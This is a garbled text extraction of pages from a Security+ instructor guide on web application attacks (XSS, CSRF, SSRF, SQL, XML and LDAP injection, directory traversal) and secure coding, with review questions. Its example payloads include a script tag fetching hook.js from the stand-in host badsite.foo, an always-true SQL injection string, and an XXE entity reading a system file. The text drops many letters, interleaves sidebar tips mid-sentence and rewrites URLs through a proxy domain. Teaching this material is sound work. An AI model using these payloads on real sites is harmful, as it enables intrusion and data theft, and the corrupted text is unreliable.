the characters most widely used in exploits.

Character Percent Encoding

null %00
space %20
CR (Carriage Return) %0D
LF (Line Feed) %0A
+ %2B
% %25
/ %2F
\ %5C
. %2E
? %3F
" %22
' %27
< %3C
> %3E
& %26
| %7C

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 374 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Application Programming Interface Attacks

Application
Web applications and cloud services implement application program interfaces (APIs)
Programming to allow consumers to automate services. An API call might use the following general
Interface Attacks URL format:

Teaching https://webapp.foo/?
Tip Action=RunInstance&Id=123&Count=1&Instance
Make sure students
AccessKey=MyInstanceAccessKey&Placement=us-
can identify the east&MyAuthorizationToken
general format of an
API call. If the API isn't secure, threat actors can easily take advantage of it to compromise the
services and data stored on the web application. An API must only be used over an
encrypted channel (HTTPS). API calls over plain HTTP are not secure and could easily be
impersonated or modified by a third party. ome other common attacks against A Is
target the following weaknesses and vulnerabilities:
• Ine ective secrets management, allowing threat actors to discover an A I key and
perform any action authorized to that key.

• Lack of input validation, allowing the threat actor to insert arbitrary parameters into
API methods and queries. This is often referred to as allowing unsanitized input.

• Error messages revealing clues to a potential adversary. For example, an

authentication error should not reveal whether a valid username has been re ected
because of an invalid password. The error should simply indicate an authentication
failure.

• Denial of service (DoS) by bombarding the API with spurious calls. Protection against
this attack can be provided through throttling/rate-limiting mechanisms.

Show Slide(s) epla Attac s

eplay Attacks
Session management enables web applications to uniquely identify a user across
a number of di erent actions and re uests. ession management is particularly
Teaching important when it comes to user authentication, as it is required to ensure the integrity
Tip of the account and the confidentiality of data associated with it. ession management
Note that replay is often vulnerable to di erent kinds of replay attack. To establish a session, the
depends on weak server normally gives the client some type of token. A replay attack works by
session management sniffing or guessing the token value and then submitting it to re establish the session
tokens. illegitimately.
HTTP is nominally a stateless protocol, meaning that the server preserves no
information about the client, but mechanisms such as cookies have been developed
to preserve stateful data. A cookie is created when the server sends an HTTP response
header with the cookie data. A cookie has a name and value, plus optional security and
expiry attributes. Subsequent request headers sent by the client will usually include
the cookie. Cookies are either nonpersistent (session) cookies, in which case they are
stored in memory and deleted when the browser instance is closed, or persistent, in
which case they are stored in the browser cache until deleted by the user or pass a
defined e piration date.
If cookies are used to store confidential information, the web application should
encrypt them before sending them to the client. If using TLS, information in a cookie
would be secure in transit but reside on the client computer in plaintext, unless it had
been separately encrypted. The value can be any URL-safe encoded string in whatever
format and structure the application uses for parsing.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 375

iewing cookies set by Google s home page using the irefox browser s Inspector tools. These cookies
are not used for authentication, but they do track whether the user has visited the site before. The
CO SE T cookie tracks whether the user has agreed to the terms and conditions of use.

Session Hijacking and Cross-Site Request Forgery Show Slide(s)

In the context of a web application, session hijacking most often means replaying a ession i acking and
cookie in some way. Attackers can sni network traffic to obtain session cookies sent Cross-Site Request
over an unsecured network, like a public i i hotspot. To counter cookie hi acking, Forgery (2)
you can encrypt cookies during transmission, delete cookies from the client's browser
cache when the client terminates the session, and design your web app to deliver a Teaching
new cookie with each new session between the app and the client's browser. Tip
Session prediction attacks focus on identifying possible weaknesses in the generation Note that a client-
side attack is where
of session tokens that will enable an attacker to predict future valid session values. If the browser runs the
an attacker can predict the session token, then the attacker can take over a session malicious code. This
that has yet to be established. A session token must be generated using a non- might trigger some
predictable algorithm, and it must not reveal any information about the session client. action on the server,
In addition, proper session management dictates that apps limit the lifespan of a but it is client-side
because the browser
session and require reauthentication after a certain period.
is coding the request.

Cross-Site Request Forgery

A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications
that use cookies to authenticate users and track sessions. To work, the attacker must
convince the victim to start a session with the target site. The attacker must then pass
an HTTP request to the victim's browser that spoofs an action on the target site, such
as changing a password or an email address. This request could be disguised in a few
ways and so could be accomplished without the victim necessarily having to click a
link. If the target site assumes that the browser is authenticated because there is a
valid session cookie and doesn't complete any additional authorization process on the
attacker's input (or if the attacker is able to spoof the authorization), it will accept the
input as genuine. This is also referred to as a confused deputy attack (the point being
that the user and the user's browser are not necessarily the same thing).

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 376 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Cross-site re uest forgery example. (Images 1 .com.)

Clickjacking
Clickjacking is an attack where what the user sees and trusts as a web application
with some sort of login page or form contains a malicious layer or invisible iFrame
that allows an attacker to intercept or redirect user input. Click acking can be launched
using any type of compromise that allows the adversary to run arbitrary code as a
script. Click acking can be mitigated by using TT response headers that instruct the
browser not to open frames from di erent origins domains and by ensuring that any
buttons or input boxes on a page are positioned on the top-most layer.

SSL Strip
Show Slide(s)
A Secure Sockets Layer (SSL) strip attack is launched against clients on a local network
as they try to make connections to websites. The threat actor must first perform a
Cross ite cripting Man-in-the-Middle attack via ARP poisoning to masquerade as the default gateway.
When a client requests an HTTP site that redirects to an HTTPS site in an unsafe way,
Teaching
the sslstrip utility (tools.kali.org/information-gathering/sslstrip) proxies the request and
Tip
response, serving the client the HTTP site, hopefully with an unencrypted login form. If
Make sure students
the user enters credentials, they will be captured by the threat actor. Sites can use the
can identify code that
performs XSS. HTTP Strict Transport Security (HSTS) lists maintained by browsers to prevent clients
Also check that
re uesting TT in the first place.
students understand
the di erence
between XSRF and
Cross ite criptin
XSS. XSRF spoofs
Web applications depend on scripting, and most websites these days are web
a specific re uest
against the web applications rather than static web pages. If the user attempts to disable scripting,
application; XSS is a very few sites will be left available. A cross-site scripting (XSS) attack exploits the fact
means of running any that the browser is likely to trust scripts that appear to come from a site the user has
arbitrary code. An XSS chosen to visit. XSS inserts a malicious script that appears to be part of the trusted site.
attack could be used A nonpersistent type of XSS attack would proceed as follows:
to perform XSRF, for
instance. 1. The attacker identifies an input validation vulnerability in the trusted site.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 377

2. The attacker crafts a L to perform a code in ection against the trusted site. This
could be coded in a link from the attacker's site to the trusted site or a link in an
email message.

3. When the user clicks the link, the trusted site returns a page containing the
malicious code in ected by the attacker. As the browser is likely to be configured
to allow the site to run scripts, the malicious code will execute.

The malicious code could be used to deface the trusted site (by adding any sort of
arbitrary HTML code), steal data from the user's cookies, try to intercept information
entered into a form, perform a request forgery attack, or try to install malware. The
crucial point is that the malicious code runs in the client's browser with the same
permission level as the trusted site.
An attack where the malicious input comes from a crafted link is a re ected or
nonpersistent XSS attack. A stored/persistent XSS attack aims to insert code into a
back-end database or content management system used by the trusted site. For
example, the attacker may submit a post to a bulletin board with a malicious script
embedded in the message. When other users view the message, the malicious script
is executed. For example, with no input sanitization, a threat actor could type the
following into a new post te t field
Check out this amazing <a href="https://trusted.
foo">website</a><script src="https://badsite.foo/
hook.js"></script>.
sers viewing the post will have the malicious script hook. s e ecute in their browser.
A third type of XSS attack exploits vulnerabilities in client-side scripts. Such scripts often
use the Document Object Model (DOM) to modify the content and layout of a web
page. For example, the "document.write" method enables a page to take some user
input and modify the page accordingly. An exploit against a client-side script could
work as follows:
1. The attacker identifies an input validation vulnerability in the trusted site. or
example, a message board might take the user's name from an input text box
and show it in a header.

https://trusted.foo/messages?user=james
2. The attacker crafts a URL to modify the parameters of a script that the server will
return, such as:

https://trusted.foo/messages#user=James%3Cscript%20
src%3D%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fbadsite.foo%2Fhook.
js%22%3E%3C%2Fscript%3E
3. The server returns a page with the legitimate DOM script embedded, but
containing the parameter:

James<script src="https://badsite.foo/hook.js"> Show Slide(s)

</script>
Structured Query
4. The browser renders the page using the DOM script, adding the text "James" to Language In ection
the header, but also e ecuting the hook. s script at the same time. Attacks

Teaching
Structured Query Language Injection Attacks Tip
Make sure students
Attacks such as session replay, CSRF, and DOM-based XSS are client-side attacks. can identify SQL code
This means that they execute arbitrary code on the browser. A server-side attack and suspicious query
causes the server to do some processing or run a script or query in a way that is not strings.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 378 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

authorized by the application design. Most server-side attacks depend on some kind of
in ection attack.
here an over ow attack works against the way a process performs memory
management, an in ection attack e ploits some unsecure way in which the application
processes requests and queries. For example, an application might allow a user to view
his or her profile with a database uery that should return the single record for that
one user's profile. An application vulnerable to an in ection attack might allow a threat
actor to return the records for all users, or to change fields in the record when they are
only supposed to be able to read them.
A web application is likely to use Structured Query Language (SQL) to read and write
information from a database. The main database operations are performed by SQL
statements for selecting data (SELECT), inserting data (INSERT), deleting data (DELETE),
and updating data (UPDATE). In a SQL injection attack, the threat actor modifies
one or more of these four basic functions by adding code to some input accepted by
the app, causing it to execute the attacker's own set of SQL queries or parameters.
If successful, this could allow the attacker to extract or insert information into the
database or execute arbitrary code on the remote system using the same privileges as
the database application (owasp.org www community attacks L In ection).
For example, consider a web form that is supposed to take a name as input. If the user
enters "Bob", the application runs the following query:
SELECT * FROM tbl_user WHERE username = 'Bob'
If a threat actor enters the string ' or 1=1-- and this input is not sanitized, the following
malicious query will be executed:
SELECT * FROM tbl_user WHERE username = '' or 1=1--#
The logical statement 1=1 is always true, and the --# string turns the rest of the
statement into a comment, making it more likely that the web application will parse
this modified version and dump a list of all users.

Show Slide(s) XML and LDAP Injection Attacks

XML and LDAP
An in ection attack can target other types of protocol where the application takes user
In ection Attacks input to construct a uery, filter, or document.

Teaching Extensible Markup Language (XML) Injection

Tip
Extensible Markup Language (XML) is used by apps for authentication and
Make sure students
authorizations, and for other types of data exchange and uploading. Data submitted
can identify XML and
LDAP syntax. via ML with no encryption or input validation is vulnerable to spoofing, re uest
forgery, and in ection of arbitrary data or code. or e ample, an ML ternal ntity
(XXE) attack embeds a request for a local resource (owasp.org/www-community/
vulnerabilities/XML_External_Entity_(XXE)_Processing).
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY bar
"file ///etc/config"> >
<bar>&bar;</bar>
This defines an entity named bar that refers to a local file path. A successful attack will
return the contents of /etc/config as part of the response.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 379

Lightweight Directory Access Protocol (LDAP) Injection

The Lightweight Directory Access Protocol (LDAP) is another example of a query
language. LDA is specifically used to read and write network directory databases. A
threat actor could exploit either unauthenticated access or a vulnerability in a client
app to submit arbitrary LDAP queries. This could allow accounts to be created or
deleted, or for the attacker to change authorizations and privileges (owasp.org/www-
community attacks LDA In ection).
LDA filters are constructed from name value attribute pairs delimited by
parentheses and the logical operators AND and . Adding filter parameters as
unsanitized input can bypass access controls. For example, if a web form authenticates
to an LDAP directory with the valid credentials Bob and Pa$$w0rd, it may construct a
query such as this from the user input:
(&(username=Bob)(password=Pa$$w0rd))
Both parameters must be true for the login to be accepted. If the form input is not
sanitized, a threat actor could bypass the password check by entering a valid username
plus an LDA filter string, such as bob)(&)). This causes the password filter to be
dropped for a condition that is always true:
(&(username=Bob)(&))

irector Tra ersal and Command In ection Attac s Show Slide(s)

Directory traversal is another type of in ection attack performed against a web server. Directory Traversal
The threat actor submits a re uest for a file outside the web server's root directory by and Command
submitting a path to navigate to the parent directory (../). This attack can succeed if the In ection Attacks
input is not filtered properly and access permissions on the file are the same as those
on the web server directory.
The threat actor might use a canonicalization attack to disguise the nature of the
malicious input. Canonicalization refers to the way the server converts between the
di erent methods by which a resource such as a file path or L may be represented
and submitted to the simplest (or canonical) method used by the server to process the
input. Examples of encoding schemes include HTML entities and character set percent
encoding (ASCII and Unicode). An attacker might be able to exploit vulnerabilities in
the canonicali ation process to perform code in ection or facilitate directory traversal.
For example, to perform a directory traversal attack, the attacker might submit a URL
such as
http //victim. oo/ show ../../../../etc/config
A limited input validation routine would prevent the use of the string ../ and refuse the
request. If the attacker submitted the URL using the encoded version of the characters,
he or she might be able to circumvent the validation routine:
http://victim.foo/?
show %2e%2e%2 %2e%2e%2 %2e%2e%2 %2e%2e%2 etc/config
A command injection attack attempts to cause the server to run OS shell commands
and return the output to the browser. As with directory traversal, the web server
should normally be able to prevent commands from operating outside of the server's
directory root and to prevent commands from running with any other privilege level
than the web "guest" user (who is normally granted only very restricted privileges).
A successful command in ection attack would find some way of circumventing this
security or find a web server that is not properly configured .

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 380 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Server-Side Request Forgery

Server-Side Request A server-side request forgery (SSRF) causes the server application to process an arbitrary
Forgery re uest that targets another service, either on the same host or a di erent one owasp.
org/www-community/attacks/Server_Side_Request_Forgery). SSRF exploits both the lack
Teaching of authentication between the internal servers and services (implicit trust) and weak
Tip input validation, allowing the attacker to submit unsanitized requests or API parameters.
Note that SSRF A web application takes API input via a URL or as data encoded in HTTP response
encompasses a
headers. The web application is likely to use a standard library to read (parse) the URL
number of techniques.
Make sure students or response headers. Many attacks depend on e ploits against specific parsing
can distinguish SSRF mechanisms in standard libraries for web servers, such as Apache or IIS, and web
and CSRF/XSRF. With application programming languages and tools, such as the curl library, Java, and PHP.
XSRF, the browser is can also use ML in ection to e ploit weaknesses in ML document parsing.
tricked into submitting
a malicious request; ne type of uses TT re uest splitting or C L in ection. The attacker crafts
with SSRF, it is the a malicious URL or request header targeting the server's API. The request contains
server that appears extra line feeds, which may be coded in some non-obvious way. Unless the web server
to make the request,
strips these out when processing the URL, it will be tricked into performing a second
either to another
service running on TT re uest.
the same host, or to a SSRF attacks are often targeted against cloud infrastructure where the web server
di erent server.
is only the public-facing component of a deeper processing chain. A typical web
application comprises multiple layers of servers, with a client interface, middleware
logic layers, and a database layer. Requests initiated from the client interface (a web
form) are likely to require multiple requests and responses between the middleware
and back-end servers. These will be implemented as HTTP header requests and
responses between each server's API. SSRF is a means of accessing these internal
servers by causing the public server to execute requests on them. While with CSRF an
exploit only has the privileges of the client, with SSRF the manipulated request is made
with the server's privilege level.

Server-side re uest forgery example. (Images 1 .com.)

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 381

SSRF encompasses a very wide range of potential exploits and targets, some of
which include
• Reconnaissance—a response may contain metadata describing the type and
configuration of internal servers. can also be used to port scan within the
internal network.

• Credential stealing—a response may contain an API key that the internal servers use
between themselves.

• Unauthorized requests—the server-initiated request might change data or access a

service in an unauthorized way.

• Protocol smuggling—despite initially being carried over HTTP, the SSRF might target
an internal MT or T server. That server may be configured in a best e ort
way, strip the HTTP header, and do its best to return the response to the SMTP or
FTP request.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 382 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Indicators o e Application Attacks
Answer the following questions:

1. You are reviewing access logs on a web server and notice repeated requests
for URLs containing the strings %3C and %3E. Is this an event that should be
investigated further, and why?

Those strings represent percent encoding for HTML tag delimiters (< and >). This could
be an attempt to in ect a script so should be investigated.

2. You have been asked to monitor baseline API usage so that a rate limiter
value can be set. What is the purpose of this?

A rate limiter will mitigate denial of service (DoS) attacks on the API, where a malicious
entity generates millions of spurious requests to block legitimate ones. You need to
establish a baseline to ensure continued availability for legitimate users by setting the
rate limit at an appropriate level.

3. How does a replay attack work in the context of session hijacking?

The attacker captures some data, such as a cookie, used to log on or start a session
legitimately. The attacker then resends the captured data to re-enable the connection.

4. How does a clickjacking attack work?

The attacker inserts an invisible layer into a trusted web page that can intercept or
redirect input without the user realizing.

5. What is a persistent XSS attack?

Where the attacker inserts malicious code into the back-end database used to serve
content to the trusted site.

6. How might an attacker exploit a web application to perform a shell

in ection attac

The attacker needs to find a vulnerable input method, such as a form control or L or
script parser, that will allow the execution of OS shell commands.

7. You are improving back-end database security to ensure that requests

deriving from front-end web servers are authenticated. What general class
of attack is this designed to mitigate?

Server-side request forgery (SSRF) causes a public server to make an arbitrary request
to a back-end server. This is made much harder if the threat actor has to defeat
an authentication or authorization mechanism between the web server and the
database server.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 383

Topic
Summari e Secure oding ractices

EXAM OBJECTIVES COVERED Teaching

. Summarize secure application development, deployment, and automation concepts Tip
. Given a scenario, implement host or application security solutions Having covered the
main attack types,
this topic looks at
hile you may not be taking on direct development duties on ma or pro ects, you will coding techniques that
often be called upon to make updates to scripts, or make a uick udgment whether a mitigate those risks.
script could be vulnerable and should be evaluated more closely for weaknesses. Being
able to summari e secure coding practices will help you to work e ectively as part of a
DevSecOps team.

ecure Codin Techni ues Show Slide(s)

The security considerations for new programming technologies should be well Secure Coding
understood and tested before deployment. One of the challenges of application Techniques
development is that the pressure to release a solution often trumps any requirement
to ensure that the application is secure. A legacy software design process might be Teaching
heavily focused on highly visible elements, such as functionality, performance, and Tip
cost. Modern development practices use a security development life cycle running in Check that students
parallel or integrated with the focus on software functionality and usability. Examples understand the
include Microsoft's SDL (microsoft.com/en-us/securityengineering/sdl) and the OWASP di erence between
Software Assurance Maturity Model (owasp.org www pro ect samm) and Security input validation and
output encoding.
Knowledge Framework (owasp.org www pro ect security knowledge framework).
Input validation occurs
A also collates descriptions of specific vulnerabilities, e ploits, and mitigation
when a script takes
techniques, such as the OWASP Top 10 (owasp.org www pro ect top ten). data passed to it by
Some of the most important coding practices are input validation, output encoding, some other process.
This could be an API
and error handling. request, user form
data, and so on. Input
Input Validation validation can be
performed by client-
A primary vector for attacking applications is to exploit faulty input validation. Input side code, server-side
could include user data entered into a form or URL passed by another application as code, or both.
a L or TT header. Malicious input could be crafted to perform an over ow attack Output encoding
or some type of script or L in ection attack. To mitigate this risk, all input methods occurs when a script
should be documented with a view to reducing the potential attack surface exposed by passes data to another
the application. There must be routines to check user input, and anything that does not script. For example,
when a server passes
conform to what is re uired must be re ected. parameters to a DOM
script running in
Normalization and Output Encoding the browser, output
encoding ensures
here an application accepts string input, the input should be sub ected to it isn't passing any
normalization procedures before being accepted. Normalization means that a string malicious "<script>"
is stripped of illegal characters or substrings and converted to the accepted character contents. Output
set. This ensures that the string is in a format that can be processed correctly by the encoding avoids the
assumption that
input validation routines. input will have been
hen user generated strings are passed through di erent conte ts in a web sanitized already.
application between TT , Java cript, , and L for instance each with

esson 1 Summarizing Secure Application Concepts | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 384 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

potentially di erent canonicali ation schemes, it is e tremely difficult to ensure that

characters that would facilitate script in ection by have been rendered safe.
Output encoding means that the string is re-encoded safely for the context in which
it is being used. For example, a web form might perform input validation at the client,
but when it reaches the server, a PHP function performs output encoding before
composing an SQL statement. Similarly, when a string is delivered from a database
using SQL, a JavaScript function would perform output encoding to render the string
using safe HTML entities (cheatsheetseries.owasp.org/cheatsheets/Cross_Site_
Scripting_Prevention_Cheat_Sheet.html).

Show Slide(s) Server-Side versus Client-Side Validation

Server-Side versus
A web application (or any other client-server application) can be designed to perform
Client-Side Validation code execution and input validation locally (on the client) or remotely (on the server).
An e ample of client side e ecution is a document ob ect model D M script to
render the page using dynamic elements from user input. Applications may use both
techni ues for di erent functions. The main issue with client side validation is that
the client will always be more vulnerable to some sort of malware interfering with the
validation process. The main issue with server-side validation is that it can be time-
consuming, as it may involve multiple transactions between the server and client.
Consequently, client-side validation is usually restricted to informing the user that
there is some sort of problem with the input before submitting it to the server. Even
after passing client-side validation, the input will still undergo server-side validation
before it can be posted (accepted). Relying on client-side validation only is poor
programming practice.

Show Slide(s) Web Application Security

Web Application
With web application, special attention must be paid to secure cookies and options for
Security HTTP response header security.

Interaction Secure Cookies

Opportunity
Cookies can be a vector for session hi acking and data e posure if not configured
Students can use
correctly (developer.mozilla.org/en-US/docs/Web/HTTP/Cookies). Some of the key
browser inspector
tools (Network tab) parameters for the SetCookie header are:
to view cookies set by • Avoid using persistent cookies for session authentication. Always use a new cookie
sites plus request and
when the user reauthenticates.
response headers and
scripts.
• Set the Secure attribute to prevent a cookie being sent over unencrypted HTTP.

• et the ttp nly attribute to make the cookie inaccessible to document ob ect
model/client-side scripting.

• Use the SameSite attribute to control from where a cookie may be sent, mitigating
request forgery attacks.

esponse eaders
A number of security options can be set in the response header returned by the
server to the client (owasp.org www pro ect secure headers). While it should seem
like a straightforward case of enabling all these, developers are often constrained by
compatibility and implementation considerations between di erent client browser
and server software types and versions. Some of the most important security-relevant
header options are:

esson 1 Summarizing Secure Application Concepts | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 385

• HTTP Strict Transport Security (HSTS)—forces browser to connect using HTTPS only,
mitigating downgrade attacks, such as SSL stripping.

• Content ecurity olicy C mitigates click acking, script in ection, and other
client-side attacks. Note that X-Frame-Options and X-XSS-Protection provide
mitigation for older browser versions, but are now deprecated in favor of CSP.

• Cache-Control—sets whether the browser can cache responses. Preventing caching

of data protects confidential and personal information where the client device might
be shared by multiple users.

Data Exposure and Memory Management Show Slide(s)

Data exposure is a fault that allows privileged information (such as a token, password, Data Exposure and
or personal data to be read without being sub ect to the appropriate access controls. Memory Management
Applications must only transmit such data between authenticated hosts, using
cryptography to protect the session. When incorporating encryption in your code, it's
important to use encryption algorithms and techniques that are known to be strong,
rather than creating your own.

Error Handling
A well-written application must be able to handle errors and exceptions gracefully.
This means that the application performs in a controlled way when something
unpredictable happens. An error or exception could be caused by invalid user input, a
loss of network connectivity, another server or process failing, and so on. Ideally, the
programmer will have written a structured exception handler (SEH) to dictate what
the application should then do. Each procedure can have multiple exception handlers.
Some handlers will deal with anticipated errors and exceptions; there should also be
a catchall handler that will deal with the unexpected. The main goal must be for the
application not to fail in a way that allows the attacker to execute code or perform
some sort of in ection attack. ne infamous e ample of a poorly written e ception
handler is the Apple GoTo bug (nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-
goto fail apples ssl bug e plained plus an unofficial patch).
Another issue is that an application's interpreter may default to a standard handler
and display default error messages when something goes wrong. These may reveal
platform information and the inner workings of code to an attacker. It is better for an
application to use custom error handlers so that the developer can choose the amount
of information shown when an error is caused.

Technically, an error is a condition that the process cannot recover from, such as the system
running out of memory. An exception is a type of error that can be handled by a block of
code without the process crashing. ote that exceptions are still described as generating
error codes/messages, however.

Memory Management
Many arbitrary code attacks depend on the target application having faulty memory
management procedures. This allows the attacker to execute his or her own code in
the space marked out by the target application. There are known unsecure practices
for memory management that should be avoided and checks for processing untrusted
input, such as strings, to ensure that it cannot overwrite areas of memory.

esson 1 Summarizing Secure Application Concepts | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 386 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Secure Code Usage

Secure Code Usage
Developing code to perform some function is hard work, so developers will often
look to see if someone else has done that work already. A program may make use of
Teaching existing code in the following ways:
Tip • Code reuse—using a block of code from elsewhere in the same application or from
The use of o the another application to perform a di erent function or perform the same function
shelf packages such as in a di erent conte t . The risk here is that the copy and paste approach causes
WordPress, Moodle,
or Joomla! can lead to
the developer to overlook potential vulnerabilities (perhaps the function's input
an easily exploitable parameters are no longer validated in the new context).
website if the relevant
security bulletins • Third-party library—using a binary package (such as a dynamic link library) that
and configuration implements some sort of standard functionality, such as establishing a network
advisories are not connection or performing cryptography. Each library must be monitored for
followed. vulnerabilities and patched promptly.
The Magecart
syndicate is a good • Software development kit (SDK)—using sample code or libraries of pre-built
example (trustwave. functions from the programming environment used to create the software or
com/en-us/resources/ interact with a third party API. As with other third party libraries or code, it is
blogs/spiderlabs-blog/
anyone-can-check-for-
imperative to monitor for vulnerabilities.
magecart with ust
the-browser).
• Stored procedures—using a pre-built function to perform a database query.
A stored procedure is a part of a database that executes a custom query. The
procedure is supplied an input by the calling program and returns a pre defined
output for matched records. This can provide a more secure means of querying the
database. Any stored procedures that are part of the database but not required by
the application should be disabled.

Show Slide(s) Other Secure Coding Practices

Other Secure Coding
Input and error handling plus secure reuse of existing code cover some of the
Practices main security-related development practices that you should be aware of. There
are a few other issues that can arise during the development and deployment of
application code.

Unreachable Code and Dead Code

Unreachable code is a part of application source code that can never be executed. For
example, there may be a routine within a logic statement (If ... Then) that can never
be called because the conditions that would call it can never be met. Dead code is
e ecuted but has no e ect on the program ow. or e ample, there may be code to
perform a calculation, but the result is never stored as a variable or used to evaluate
a condition.
This type of code may be introduced through carelessly reused code, or when a block
of code is rewritten or changed. Unreachable and dead code should be removed
from the application to forestall the possibility that it could be misused in some way.
The presence of unreachable/dead code can indicate that the application is not being
well maintained.

uscation Camou a e
It is important that code be well documented, to assist the e orts of multiple
programmers working on the same pro ect. ell documented code is also easier to
analyze, however, which may assist the development of attacks. Code can be made
difficult to analy e by using an obfuscator, which is software that randomi es the
names of variables, constants, functions, and procedures, removes comments and

esson 1 Summarizing Secure Application Concepts | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 387

white space, and performs other operations to make the compiled code physically
and mentally difficult to read and follow. This sort of techni ue might be used to
make reverse engineering an application more difficult and as a way of disguising
malware code.

tatic Code Anal sis Show Slide(s)

Development is only one stage in the software life cycle. A new release of an tatic Code Analysis
application or automation script should be audited to ensure that it meets the goals of
confidentiality, integrity, and availability critical to any secure computer system.
Static code analysis (or source code analysis) is performed against the application
code before it is packaged as an executable process. The analysis software must
support the programming language used by the source code. The software will scan
the source code for signatures of known issues, such as OWASP Top 10 Most Critical
eb Application ecurity isks or in ection vulnerabilities generally. NI T maintains a
list of source code analyzers and their key features (samate.nist.gov/index.php/Source_
Code_Security_Analyzers.html).
Human analysis of software source code is described as a manual code review. It is
important that the code be reviewed by developers (peers) other than the original
coders to try to identify oversights, mistaken assumptions, or a lack of knowledge or
experience. It is important to establish a collaborative environment in which reviews
can take place e ectively.

Dynamic Code Analysis Show Slide(s)

Static code review techniques will not reveal vulnerabilities that might exist in the Dynamic Code
runtime environment, such as exposure to race conditions or unexpected user input. Analysis
Dynamic analysis means that the application is tested under "real world" conditions
using a staging environment.
Fuzzing is a means of testing that an application's input validation routines work
well. Fuzzing means that the test or vulnerability scanner generates large amounts
of deliberately invalid and/or random input and records the responses made by
the application. This is a form of "stress testing" that can reveal how robust the
application is. There are generally three types of fu ers, representing di erent ways of
in ecting manipulated input into the application
• Application UI—identify input streams accepted by the application, such as input
boxes, command line switches, or import/export functions.

• Protocol—transmit manipulated packets to the application, perhaps using

unexpected values in the headers or payload.

• ile format attempt to open files whose format has been manipulated, perhaps
manipulating specific features of the file.

Fuzzers are also distinguished by the way in which they craft each input (or test
case . The fu er may use semi random input dumb fu er or might craft specific
input based around known exploit vectors, such as escaped command sequences or
character literals, or by mutating intercepted inputs.
Associated with fuzzing is the concept of stress testing an application to see how an
application performs under extreme performance or usage scenarios.

esson 1 Summarizing Secure Application Concepts | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 388 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Finally, the fuzzer needs some means of detecting an application crash and recording
which input se uence generated the crash.

Loading a list of strings for the payload of a fuzzing test in Burp Suite.
(Screenshot Burp Suite portswigger.net/burp.)

esson 1 Summarizing Secure Application Concepts | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 389

Review Activity:
Secure oding ractices
Answer the following questions:

1. What type of programming practice defends against injection-style attacks,

such as inserting SQL commands into a database application from a site
search form?

Input validation provides some mitigation against this type of input being passed to an
application via a user form. Output encoding could provide another layer of protection
by checking that the query that the script passes to the database is safe.

2. hat codin practice pro ides specific miti ation a ainst

Output encoding ensures that strings are made safe for the context they are being
passed to, such as when a JavaScript variable provides output to render as HTML. Safe
means that the string does not contain unauthorized syntax elements, such as script
tags.

3. You are discussing execution and validation security for DOM scripting with
the web team. A junior team member wants to know if this relates to client-
side or server-side code. What is your response?

The document ob ect model D M is the means by which a script Java cript can
change the way a page is rendered. As this change is rendered by the browser, it is
client-side code.

4. Which response header provides protection against SSL stripping attacks?

HTTP Strict Transport Security (HSTS).

5. What vulnerabilities might default error messages reveal?

A default error message might reveal platform information and the workings of the
code to an attacker.

6. hat is an and ho does it a ect secure de elopment

A software development kit (SDK) contains tools and code examples released by a
vendor to make developing applications within a particular environment (framework,
programming language, OS, and so on) easier. Any element in the SDK could contain
vulnerabilities that could then be transferred to the developer's code or application.

